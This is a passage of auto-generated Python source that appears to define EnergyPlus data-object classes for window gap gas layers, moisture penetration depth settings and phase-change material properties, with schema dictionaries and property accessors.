ValueError: if `value` is not a valid value
Returns:
float or "Autocalculate": the value of `back_side_diffusediffuse_solar_reflectance` or None if not set
"""
return self["Back Side Diffuse-Diffuse Solar Reflectance"]
@back_side_diffusediffuse_solar_reflectance.setter
def back_side_diffusediffuse_solar_reflectance(
self,
value="autocalculate"):
""" Corresponds to IDD field `Back Side Diffuse-Diffuse Solar Reflectance`
"""
self["Back Side Diffuse-Diffuse Solar Reflectance"] = value
@property
def diffusediffuse_visible_solar_transmittance(self):
"""field `Diffuse-Diffuse Visible Solar Transmittance`
| Used only when Optical Data Type = SpectralAverage
| This input field is not used currently.
| Units: dimensionless
| Default value: "autocalculate"
| value <= 1.0
Args:
value (float or "Autocalculate"): value for IDD Field `Diffuse-Diffuse Visible Solar Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autocalculate": the value of `diffusediffuse_visible_solar_transmittance` or None if not set
"""
return self["Diffuse-Diffuse Visible Solar Transmittance"]
@diffusediffuse_visible_solar_transmittance.setter
def diffusediffuse_visible_solar_transmittance(
self,
value="autocalculate"):
""" Corresponds to IDD field `Diffuse-Diffuse Visible Solar Transmittance`
"""
self["Diffuse-Diffuse Visible Solar Transmittance"] = value
@property
def front_side_diffusediffuse_visible_solar_reflectance(self):
"""field `Front Side Diffuse-Diffuse Visible Solar Reflectance`
| Used only when Optical Data Type = SpectralAverage
| This input field is not used currently.
| Units: dimensionless
| Default value: "autocalculate"
| value <= 1.0
Args:
value (float or "Autocalculate"): value for IDD Field `Front Side Diffuse-Diffuse Visible Solar Reflectance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autocalculate": the value of `front_side_diffusediffuse_visible_solar_reflectance` or None if not set
"""
return self["Front Side Diffuse-Diffuse Visible Solar Reflectance"]
@front_side_diffusediffuse_visible_solar_reflectance.setter
def front_side_diffusediffuse_visible_solar_reflectance(
self,
value="autocalculate"):
""" Corresponds to IDD field `Front Side Diffuse-Diffuse Visible Solar Reflectance`
"""
self["Front Side Diffuse-Diffuse Visible Solar Reflectance"] = value
@property
def back_side_diffusediffuse_visible_solar_reflectance(self):
"""field `Back Side Diffuse-Diffuse Visible Solar Reflectance`
| Used only when Optical Data Type = SpectralAverage
| This input field is not used currently.
| Units: dimensionless
| Default value: "autocalculate"
| value <= 1.0
Args:
value (float or "Autocalculate"): value for IDD Field `Back Side Diffuse-Diffuse Visible Solar Reflectance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autocalculate": the value of `back_side_diffusediffuse_visible_solar_reflectance` or None if not set
"""
return self["Back Side Diffuse-Diffuse Visible Solar Reflectance"]
@back_side_diffusediffuse_visible_solar_reflectance.setter
def back_side_diffusediffuse_visible_solar_reflectance(
self,
value="autocalculate"):
""" Corresponds to IDD field `Back Side Diffuse-Diffuse Visible Solar Reflectance`
"""
self["Back Side Diffuse-Diffuse Visible Solar Reflectance"] = value
@property
def infrared_transmittance_applies_to_front_and_back(self):
"""field `Infrared Transmittance (applies to front and back)`
| The long-wave hemispherical transmittance of the glazing.
| Assumed to be the same for both sides of the glazing.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Infrared Transmittance (applies to front and back)`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `infrared_transmittance_applies_to_front_and_back` or None if not set
"""
return self["Infrared Transmittance (applies to front and back)"]
@infrared_transmittance_applies_to_front_and_back.setter
def infrared_transmittance_applies_to_front_and_back(self, value=None):
"""Corresponds to IDD field `Infrared Transmittance (applies to front
and back)`"""
self["Infrared Transmittance (applies to front and back)"] = value
@property
def front_side_infrared_emissivity(self):
"""field `Front Side Infrared Emissivity`
| The front side long-wave hemispherical emissivity of the glazing.
| Units: dimensionless
| Default value: 0.84
| value < 1.0
Args:
value (float): value for IDD Field `Front Side Infrared Emissivity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `front_side_infrared_emissivity` or None if not set
"""
return self["Front Side Infrared Emissivity"]
@front_side_infrared_emissivity.setter
def front_side_infrared_emissivity(self, value=0.84):
"""Corresponds to IDD field `Front Side Infrared Emissivity`"""
self["Front Side Infrared Emissivity"] = value
@property
def back_side_infrared_emissivity(self):
"""field `Back Side Infrared Emissivity`
| The back side long-wave hemispherical emissivity of the glazing.
| Units: dimensionless
| Default value: 0.84
| value < 1.0
Args:
value (float): value for IDD Field `Back Side Infrared Emissivity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `back_side_infrared_emissivity` or None if not set
"""
return self["Back Side Infrared Emissivity"]
@back_side_infrared_emissivity.setter
def back_side_infrared_emissivity(self, value=0.84):
"""Corresponds to IDD field `Back Side Infrared Emissivity`"""
self["Back Side Infrared Emissivity"] = value
class WindowMaterialGapEquivalentLayer(DataObject):
""" Corresponds to IDD object `WindowMaterial:Gap:EquivalentLayer`
Gas material properties that are used in Windows Equivalent Layer
References only WindowMaterial:Gas properties
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'gas type',
{'name': u'Gas Type',
'pyname': u'gas_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'AIR',
u'ARGON',
u'KRYPTON',
u'XENON',
u'CUSTOM'],
'autocalculatable': False,
'type': 'alpha'}),
(u'thickness',
{'name': u'Thickness',
'pyname': u'thickness',
'minimum>': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'gap vent type',
{'name': u'Gap Vent Type',
'pyname': u'gap_vent_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Sealed',
u'VentedIndoor',
u'VentedOutdoor'],
'autocalculatable': False,
'type': 'alpha'}),
(u'conductivity coefficient a',
{'name': u'Conductivity Coefficient A',
'pyname': u'conductivity_coefficient_a',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m-K'}),
(u'conductivity coefficient b',
{'name': u'Conductivity Coefficient B',
'pyname': u'conductivity_coefficient_b',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m-K2'}),
(u'conductivity coefficient c',
{'name': u'Conductivity Coefficient C',
'pyname': u'conductivity_coefficient_c',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m-K3'}),
(u'viscosity coefficient a',
{'name': u'Viscosity Coefficient A',
'pyname': u'viscosity_coefficient_a',
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'kg/m-s'}),
(u'viscosity coefficient b',
{'name': u'Viscosity Coefficient B',
'pyname': u'viscosity_coefficient_b',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'kg/m-s-K'}),
(u'viscosity coefficient c',
{'name': u'Viscosity Coefficient C',
'pyname': u'viscosity_coefficient_c',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'kg/m-s-K2'}),
(u'specific heat coefficient a',
{'name': u'Specific Heat Coefficient A',
'pyname': u'specific_heat_coefficient_a',
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'J/kg-K'}),
(u'specific heat coefficient b',
{'name': u'Specific Heat Coefficient B',
'pyname': u'specific_heat_coefficient_b',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'J/kg-K2'}),
(u'specific heat coefficient c',
{'name': u'Specific Heat Coefficient C',
'pyname': u'specific_heat_coefficient_c',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'J/kg-K3'}),
(u'molecular weight',
{'name': u'Molecular Weight',
'pyname': u'molecular_weight',
'maximum': 200.0,
'required-field': False,
'autosizable': False,
'minimum': 20.0,
'autocalculatable': False,
'type': u'real',
'unit': u'g/mol'}),
(u'specific heat ratio',
{'name': u'Specific Heat Ratio',
'pyname': u'specific_heat_ratio',
'minimum>': 1.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 3,
'name': u'WindowMaterial:Gap:EquivalentLayer',
'pyname': u'WindowMaterialGapEquivalentLayer',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def gas_type(self):
"""field `Gas Type`
Args:
value (str): value for IDD Field `Gas Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `gas_type` or None if not set
"""
return self["Gas Type"]
@gas_type.setter
def gas_type(self, value=None):
"""Corresponds to IDD field `Gas Type`"""
self["Gas Type"] = value
@property
def thickness(self):
"""field `Thickness`
| Units: m
| IP-Units: in
Args:
value (float): value for IDD Field `Thickness`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thickness` or None if not set
"""
return self["Thickness"]
@thickness.setter
def thickness(self, value=None):
"""Corresponds to IDD field `Thickness`"""
self["Thickness"] = value
@property
def gap_vent_type(self):
"""field `Gap Vent Type`
| Sealed means the gap is enclosed and gas tight, i.e., no venting to indoor or
| outdoor environment. VentedIndoor means the gap is vented to indoor environment, and
| VentedOutdoor means the gap is vented to the outdoor environment. The gap types
| VentedIndoor and VentedOutdoor are used with gas type "Air" only.
Args:
value (str): value for IDD Field `Gap Vent Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `gap_vent_type` or None if not set
"""
return self["Gap Vent Type"]
@gap_vent_type.setter
def gap_vent_type(self, value=None):
"""Corresponds to IDD field `Gap Vent Type`"""
self["Gap Vent Type"] = value
@property
def conductivity_coefficient_a(self):
"""field `Conductivity Coefficient A`
| Used only if Gas Type = Custom
| Units: W/m-K
Args:
value (float): value for IDD Field `Conductivity Coefficient A`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `conductivity_coefficient_a` or None if not set
"""
return self["Conductivity Coefficient A"]
@conductivity_coefficient_a.setter
def conductivity_coefficient_a(self, value=None):
"""Corresponds to IDD field `Conductivity Coefficient A`"""
self["Conductivity Coefficient A"] = value
@property
def conductivity_coefficient_b(self):
"""field `Conductivity Coefficient B`
| Used only if Gas Type = Custom
| Units: W/m-K2
Args:
value (float): value for IDD Field `Conductivity Coefficient B`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `conductivity_coefficient_b` or None if not set
"""
return self["Conductivity Coefficient B"]
@conductivity_coefficient_b.setter
def conductivity_coefficient_b(self, value=None):
"""Corresponds to IDD field `Conductivity Coefficient B`"""
self["Conductivity Coefficient B"] = value
@property
def conductivity_coefficient_c(self):
"""field `Conductivity Coefficient C`
| Used only if Gas Type = Custom
| Units: W/m-K3
Args:
value (float): value for IDD Field `Conductivity Coefficient C`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `conductivity_coefficient_c` or None if not set
"""
return self["Conductivity Coefficient C"]
@conductivity_coefficient_c.setter
def conductivity_coefficient_c(self, value=None):
"""Corresponds to IDD field `Conductivity Coefficient C`"""
self["Conductivity Coefficient C"] = value
@property
def viscosity_coefficient_a(self):
"""field `Viscosity Coefficient A`
| Used only if Gas Type = Custom
| Units: kg/m-s
Args:
value (float): value for IDD Field `Viscosity Coefficient A`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `viscosity_coefficient_a` or None if not set
"""
return self["Viscosity Coefficient A"]
@viscosity_coefficient_a.setter
def viscosity_coefficient_a(self, value=None):
"""Corresponds to IDD field `Viscosity Coefficient A`"""
self["Viscosity Coefficient A"] = value
@property
def viscosity_coefficient_b(self):
"""field `Viscosity Coefficient B`
| Used only if Gas Type = Custom
| Units: kg/m-s-K
Args:
value (float): value for IDD Field `Viscosity Coefficient B`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `viscosity_coefficient_b` or None if not set
"""
return self["Viscosity Coefficient B"]
@viscosity_coefficient_b.setter
def viscosity_coefficient_b(self, value=None):
"""Corresponds to IDD field `Viscosity Coefficient B`"""
self["Viscosity Coefficient B"] = value
@property
def viscosity_coefficient_c(self):
"""field `Viscosity Coefficient C`
| Used only if Gas Type = Custom
| Units: kg/m-s-K2
Args:
value (float): value for IDD Field `Viscosity Coefficient C`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `viscosity_coefficient_c` or None if not set
"""
return self["Viscosity Coefficient C"]
@viscosity_coefficient_c.setter
def viscosity_coefficient_c(self, value=None):
"""Corresponds to IDD field `Viscosity Coefficient C`"""
self["Viscosity Coefficient C"] = value
@property
def specific_heat_coefficient_a(self):
"""field `Specific Heat Coefficient A`
| Used only if Gas Type = Custom
| Units: J/kg-K
Args:
value (float): value for IDD Field `Specific Heat Coefficient A`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `specific_heat_coefficient_a` or None if not set
"""
return self["Specific Heat Coefficient A"]
@specific_heat_coefficient_a.setter
def specific_heat_coefficient_a(self, value=None):
"""Corresponds to IDD field `Specific Heat Coefficient A`"""
self["Specific Heat Coefficient A"] = value
@property
def specific_heat_coefficient_b(self):
"""field `Specific Heat Coefficient B`
| Used only if Gas Type = Custom
| Units: J/kg-K2
Args:
value (float): value for IDD Field `Specific Heat Coefficient B`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `specific_heat_coefficient_b` or None if not set
"""
return self["Specific Heat Coefficient B"]
@specific_heat_coefficient_b.setter
def specific_heat_coefficient_b(self, value=None):
"""Corresponds to IDD field `Specific Heat Coefficient B`"""
self["Specific Heat Coefficient B"] = value
@property
def specific_heat_coefficient_c(self):
"""field `Specific Heat Coefficient C`
| Used only if Gas Type = Custom
| Units: J/kg-K3
Args:
value (float): value for IDD Field `Specific Heat Coefficient C`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `specific_heat_coefficient_c` or None if not set
"""
return self["Specific Heat Coefficient C"]
@specific_heat_coefficient_c.setter
def specific_heat_coefficient_c(self, value=None):
"""Corresponds to IDD field `Specific Heat Coefficient C`"""
self["Specific Heat Coefficient C"] = value
@property
def molecular_weight(self):
"""field `Molecular Weight`
| Used only if Gas Type = Custom
| Units: g/mol
| value >= 20.0
| value <= 200.0
Args:
value (float): value for IDD Field `Molecular Weight`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `molecular_weight` or None if not set
"""
return self["Molecular Weight"]
@molecular_weight.setter
def molecular_weight(self, value=None):
"""Corresponds to IDD field `Molecular Weight`"""
self["Molecular Weight"] = value
@property
def specific_heat_ratio(self):
"""field `Specific Heat Ratio`
| Used only if Gas Type = Custom
| value > 1.0
Args:
value (float): value for IDD Field `Specific Heat Ratio`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `specific_heat_ratio` or None if not set
"""
return self["Specific Heat Ratio"]
@specific_heat_ratio.setter
def specific_heat_ratio(self, value=None):
"""Corresponds to IDD field `Specific Heat Ratio`"""
self["Specific Heat Ratio"] = value
class MaterialPropertyMoisturePenetrationDepthSettings(DataObject):
""" Corresponds to IDD object `MaterialProperty:MoisturePenetrationDepth:Settings`
Additional properties for moisture using EMPD procedure
HeatBalanceAlgorithm choice=MoisturePenetrationDepthConductionTransferFunction only
Has no effect with other HeatBalanceAlgorithm solution algorithms
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'moisture penetration depth',
{'name': u'Moisture Penetration Depth',
'pyname': u'moisture_penetration_depth',
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'moisture equation coefficient a',
{'name': u'Moisture Equation Coefficient a',
'pyname': u'moisture_equation_coefficient_a',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'moisture equation coefficient b',
{'name': u'Moisture Equation Coefficient b',
'pyname': u'moisture_equation_coefficient_b',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'moisture equation coefficient c',
{'name': u'Moisture Equation Coefficient c',
'pyname': u'moisture_equation_coefficient_c',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'moisture equation coefficient d',
{'name': u'Moisture Equation Coefficient d',
'pyname': u'moisture_equation_coefficient_d',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 0,
'name': u'MaterialProperty:MoisturePenetrationDepth:Settings',
'pyname': u'MaterialPropertyMoisturePenetrationDepthSettings',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
| Material Name that the moisture properties will be added to.
| Additional material properties required to perform the EMPD model.
| Effective Mean Penetration Depth (EMPD)
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def moisture_penetration_depth(self):
"""field `Moisture Penetration Depth`
| This is the penetration depth
| Units: m
Args:
value (float): value for IDD Field `Moisture Penetration Depth`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_penetration_depth` or None if not set
"""
return self["Moisture Penetration Depth"]
@moisture_penetration_depth.setter
def moisture_penetration_depth(self, value=None):
"""Corresponds to IDD field `Moisture Penetration Depth`"""
self["Moisture Penetration Depth"] = value
@property
def moisture_equation_coefficient_a(self):
"""field `Moisture Equation Coefficient a`
| Units: dimensionless
Args:
value (float): value for IDD Field `Moisture Equation Coefficient a`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_equation_coefficient_a` or None if not set
"""
return self["Moisture Equation Coefficient a"]
@moisture_equation_coefficient_a.setter
def moisture_equation_coefficient_a(self, value=None):
"""Corresponds to IDD field `Moisture Equation Coefficient a`"""
self["Moisture Equation Coefficient a"] = value
@property
def moisture_equation_coefficient_b(self):
"""field `Moisture Equation Coefficient b`
| Units: dimensionless
Args:
value (float): value for IDD Field `Moisture Equation Coefficient b`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_equation_coefficient_b` or None if not set
"""
return self["Moisture Equation Coefficient b"]
@moisture_equation_coefficient_b.setter
def moisture_equation_coefficient_b(self, value=None):
"""Corresponds to IDD field `Moisture Equation Coefficient b`"""
self["Moisture Equation Coefficient b"] = value
@property
def moisture_equation_coefficient_c(self):
"""field `Moisture Equation Coefficient c`
| Units: dimensionless
Args:
value (float): value for IDD Field `Moisture Equation Coefficient c`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_equation_coefficient_c` or None if not set
"""
return self["Moisture Equation Coefficient c"]
@moisture_equation_coefficient_c.setter
def moisture_equation_coefficient_c(self, value=None):
"""Corresponds to IDD field `Moisture Equation Coefficient c`"""
self["Moisture Equation Coefficient c"] = value
@property
def moisture_equation_coefficient_d(self):
"""field `Moisture Equation Coefficient d`
| Units: dimensionless
Args:
value (float): value for IDD Field `Moisture Equation Coefficient d`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_equation_coefficient_d` or None if not set
"""
return self["Moisture Equation Coefficient d"]
@moisture_equation_coefficient_d.setter
def moisture_equation_coefficient_d(self, value=None):
"""Corresponds to IDD field `Moisture Equation Coefficient d`"""
self["Moisture Equation Coefficient d"] = value
class MaterialPropertyPhaseChange(DataObject):
""" Corresponds to IDD object `MaterialProperty:PhaseChange`
Additional properties for temperature dependent thermal conductivity
and enthalpy for Phase Change Materials (PCM)
HeatBalanceAlgorithm = CondFD(ConductionFiniteDifference) solution algorithm only.
Constructions with this should use the detailed CondFD process.
Has no effect with other HeatBalanceAlgorithm solution algorithms
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'temperature coefficient for thermal conductivity',
{'name': u'Temperature Coefficient for Thermal Conductivity',
'pyname': u'temperature_coefficient_for_thermal_conductivity',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m-K2'}),
(u'temperature 1',
{'name': u'Temperature 1',
'pyname': u'temperature_1',
'default': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'enthalpy 1',
{'name': u'Enthalpy 1',
'pyname': u'enthalpy_1',
'default': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'J/kg'}),
(u'temperature 2',
{'name': u'Temperature 2',
'pyname': u'temperature_2',
'default': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'enthalpy 2',
{'name': u'Enthalpy 2',
'pyname': u'enthalpy_2',
'default': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'J/kg'}),
(u'temperature 3',
{'name': u'Temperature 3',
'pyname': u'temperature_3',
'default': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'enthalpy 3',
{'name': u'Enthalpy 3',
'pyname': u'enthalpy_3',
'default': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'J/kg'}),
(u'temperature 4',
{'name': u'Temperature 4',
'pyname': u'temperature_4',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'enthalpy 4',
{'name': u'Enthalpy 4',
'pyname': u'enthalpy_4',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'J/kg'}),
(u'temperature 5',
{'name': u'Temperature 5',
'pyname': u'temperature_5',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'enthalpy 5',
{'name': u'Enthalpy 5',
'pyname': u'enthalpy_5',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'J/kg'}),
(u'temperature 6',
{'name': u'Temperature 6',
'pyname': u'temperature_6',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'enthalpy 6',
{'name': u'Enthalpy 6',
'pyname': u'enthalpy_6',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'J/kg'}),
(u'temperature 7',
{'name': u'Temperature 7',
'pyname': u'temperature_7',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'enthalpy 7',
{'name': u'Enthalpy 7',
'pyname': u'enthalpy_7',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'J/kg'}),
(u'temperature 8',
{'name': u'Temperature 8',
'pyname': u'temperature_8',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'enthalpy 8',
{'name': u'Enthalpy 8',
'pyname': u'enthalpy_8',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'J/kg'}),
(u'temperature 9',
{'name': u'Temperature 9',
'pyname': u'temperature_9',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'enthalpy 9',
{'name': u'Enthalpy 9',
'pyname': u'enthalpy_9',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'J/kg'}),
(u'temperature 10',
{'name': u'Temperature 10',
'pyname': u'temperature_10',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'enthalpy 10',
{'name': u'Enthalpy 10',
'pyname': u'enthalpy_10',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'J/kg'}),
(u'temperature 11',
{'name': u'Temperature 11',
'pyname': u'temperature_11',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'enthalpy 11',
{'name': u'Enthalpy 11',
'pyname': u'enthalpy_11',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'J/kg'}),
(u'temperature 12',
{'name': u'Temperature 12',
'pyname': u'temperature_12',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'enthalpy 12',
{'name': u'Enthalpy 12',
'pyname': u'enthalpy_12',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'J/kg'}),
(u'temperature 13',
{'name': u'Temperature 13',
'pyname': u'temperature_13',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'enthalpy 13',
{'name': u'Enthalpy 13',
'pyname': u'enthalpy_13',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'J/kg'}),
(u'temperature 14',
{'name': u'Temperature 14',
'pyname': u'temperature_14',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'enthalpy 14',
{'name': u'Enthalpy 14',
'pyname': u'enthalpy_14',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'J/kg'}),
(u'temperature 15',
{'name': u'Temperature 15',
'pyname': u'temperature_15',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'enthalpy 15',
{'name': u'Enthalpy 15',
'pyname': u'enthalpy_15',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'J/kg'}),
(u'temperature 16',
{'name': u'Temperature 16',
'pyname': u'temperature_16',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'enthalpy 16',
{'name': u'Enthalpy 16',
'pyname': u'enthalpy_16',
'default': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'J/kg'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 0,
'name': u'MaterialProperty:PhaseChange',
'pyname': u'MaterialPropertyPhaseChange',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
| Regular Material Name to which the additional properties will be added.
| this the material name for the basic material properties.
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def temperature_coefficient_for_thermal_conductivity(self):
"""field `Temperature Coefficient for Thermal Conductivity`
| The base temperature is 20C.
| This is the thermal conductivity change per degree excursion from 20C.
| This variable conductivity function is overridden by the VariableThermalConductivity object, if present.
| Units: W/m-K2
Args:
value (float): value for IDD Field `Temperature Coefficient for Thermal Conductivity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_coefficient_for_thermal_conductivity` or None if not set
"""
return self["Temperature Coefficient for Thermal Conductivity"]
@temperature_coefficient_for_thermal_conductivity.setter
def temperature_coefficient_for_thermal_conductivity(self, value=None):
"""Corresponds to IDD field `Temperature Coefficient for Thermal
Conductivity`"""
self["Temperature Coefficient for Thermal Conductivity"] = value
@property
def temperature_1(self):
"""field `Temperature 1`
| for Temperature-enthalpy function
| Units: C
Args:
value (float): value for IDD Field `Temperature 1`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_1` or None if not set
"""
return self["Temperature 1"]
@temperature_1.setter
def temperature_1(self, value=None):
"""Corresponds to IDD field `Temperature 1`"""
self["Temperature 1"] = value
@property
def enthalpy_1(self):
"""field `Enthalpy 1`
| for Temperature-enthalpy function corresponding to temperature 1
| Units: J/kg
Args:
value (float): value for IDD Field `Enthalpy 1`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `enthalpy_1` or None if not set
"""
return self["Enthalpy 1"]
@enthalpy_1.setter
def enthalpy_1(self, value=None):
"""Corresponds to IDD field `Enthalpy 1`"""
self["Enthalpy 1"] = value
@property
def temperature_2(self):
"""field `Temperature 2`
| for Temperature-enthalpy function
| Units: C
Args:
value (float): value for IDD Field `Temperature 2`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_2` or None if not set
"""
return self["Temperature 2"]
@temperature_2.setter
def temperature_2(self, value=None):
"""Corresponds to IDD field `Temperature 2`"""
self["Temperature 2"] = value
@property
def enthalpy_2(self):
"""field `Enthalpy 2`
| for Temperature-enthalpy function corresponding to temperature 2
| Units: J/kg
Args:
value (float): value for IDD Field `Enthalpy 2`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `enthalpy_2` or None if not set
"""
return self["Enthalpy 2"]
@enthalpy_2.setter
def enthalpy_2(self, value=None):
"""Corresponds to IDD field `Enthalpy 2`"""
self["Enthalpy 2"] = value
@property
def temperature_3(self):
"""field `Temperature 3`
| for Temperature-enthalpy function
